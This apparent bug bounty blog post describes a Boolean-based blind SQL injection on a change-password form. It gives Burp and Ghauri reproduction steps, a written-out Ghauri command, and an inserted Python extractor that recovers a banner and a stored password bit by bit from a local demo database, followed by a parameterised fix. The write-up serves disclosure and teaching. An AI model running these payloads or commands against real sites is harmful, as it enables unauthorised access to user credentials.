#4. Bug Bounty Series: Exploiting Boolean-based SQL Injection

Cyb3r M!nds
3 min readAug 2, 2024


Hello guys 👋 I’m back with one more article, this time on a Boolean-based SQL injection through which I was able to reach user credentials.

What is Boolean based SQLi?

Boolean-based (blind) SQL injection is a technique in which the attacker injects a condition into an SQL query and forces the application to return different results depending on whether that condition evaluates to TRUE or FALSE. The application never echoes data from the database directly; the attacker instead asks yes/no questions (for example, "is the first character of the current database name greater than 'm'?") and reads the answer from the response.

Depending on the Boolean result (TRUE or FALSE), the content of the HTTP response changes or stays the same, and by repeating this one bit at a time the attacker can recover database names, banners and table contents even though no query output is ever shown.

Impacts of SQLi:

Depending on the backend database configuration, access privileges and the operating system, an attacker can mount one or more of the following types of attacks:

  • Reading, updating and deleting data from the database tables
  • Executing commands on the underlying operating system (where the DBMS exposes such functionality)

So, as usual, I started by exploring the website and understanding the functionality it offers. The target application is an e-commerce website; I’ll refer to it as www.example.com, as I’m not allowed to reveal the domain name.

While testing the change-password functionality for other vulnerabilities, I decided to check the change-password page for SQL injection as well.

Let’s get to the point now…..😉

Steps to Reproduce:

  1. Click on the change password button and submit any dummy information.

  2. Open Burp Suite, go to the Proxy tab and intercept the request.

  3. Send the request to Repeater. After manipulating the available parameters, I noticed that the user parameter was vulnerable to SQL injection.

  4. Copy the raw POST request and save it as burp.txt.

  5. To confirm the vulnerability, I used the Ghauri tool (sqlmap works as well). Install Ghauri and run the following command (long options take double hyphens):

ghauri -r burp.txt -p user --level 3 --risk 3 --current-db --banner

  Note that risk level 3 enables OR-based payloads, which can alter data if the vulnerable statement is an UPDATE, so on a password-change endpoint it is safer to start at a lower risk level and raise it only if needed.

  6. After a few minutes, I received the current database name and the DBMS banner.
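The following is an added example, not code from the write-up or from Ghauri. It shows what the definition above and the Ghauri run in step 5 actually do: a hypothetical change-password check whose user parameter is concatenated into SQL, a true/false oracle built on it, and an extractor that recovers the DBMS banner and a stored password one bit at a time. The target's DBMS is not named in the post, so an in-memory SQLite database (with constructed table, rows and handler names) stands in for the backend.

```python
import sqlite3

# Added example, not the write-up's code. The real target's DBMS is unknown, so an
# in-memory SQLite database stands in for the e-commerce backend; the users table,
# its rows and the handler names below are constructed for this demonstration.
SQLITE_VERSION = sqlite3.sqlite_version  # the "banner" the oracle will recover


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    return con


CON = build_db()


def verify_user_vulnerable(user, old_password):
    """Hypothetical change-password check: the `user` value is pasted into the
    query, so the attacker controls part of the WHERE clause. The caller only
    sees True ("password changed") or False ("invalid user or password")."""
    query = ("SELECT COUNT(*) FROM users WHERE user = '%s' AND password = '%s'"
             % (user, old_password))
    (n,) = CON.execute(query).fetchone()
    return n > 0


def verify_user_fixed(user, old_password):
    """Same check with a parameterised query: the payload is compared as a
    literal username and never becomes SQL."""
    (n,) = CON.execute(
        "SELECT COUNT(*) FROM users WHERE user = ? AND password = ?",
        (user, old_password)).fetchone()
    return n > 0


def oracle(condition):
    """One request to the vulnerable endpoint. The trailing '-- ' comments out
    the password check, so the response depends only on `condition`."""
    payload = "alice' AND (%s)-- " % condition
    return verify_user_vulnerable(payload, "not-the-password")


def extract_string(expr, max_len=64):
    """Recover the value of SQL expression `expr` using only true/false answers:
    binary-search the length, then binary-search each character's code point."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("length(%s) > %d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    chars = []
    for i in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII is enough for a banner or password
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr(%s, %d, 1)) > %d" % (expr, i, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    print("banner  :", extract_string("sqlite_version()"))
    print("bob     :", extract_string("(SELECT password FROM users WHERE user = 'bob')"))
    print("fixed handler, same payload:", verify_user_fixed("alice' AND (1=1)-- ", "x"))
```

Each character costs about seven requests (a binary search over 32..126), which is why the tool run in step 5 takes "a few minutes" rather than seconds; Ghauri and sqlmap automate exactly this loop, with payloads adapted to the detected DBMS. The parameterised handler at the end returns False for the same payload because the whole string, comment included, is compared against the user column as data.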

I reported the vulnerability with joy 😍. The issue was rated critical, and the finding was accepted by the end of the day.

So, that’s it for now. Thanks for reading, and I appreciate you taking the time. For other writeups like this one, see my other posts.

If you found it useful, please click the 👏 button and share it with others who have similar interests! Feedback is always appreciated!! 😊


Written by Cyb3r M!nds

DevSecOps | Freelancer | Cloud Security | Web Pentester | Android & iOS Pentester | API Pentester | Blogger | Learner .
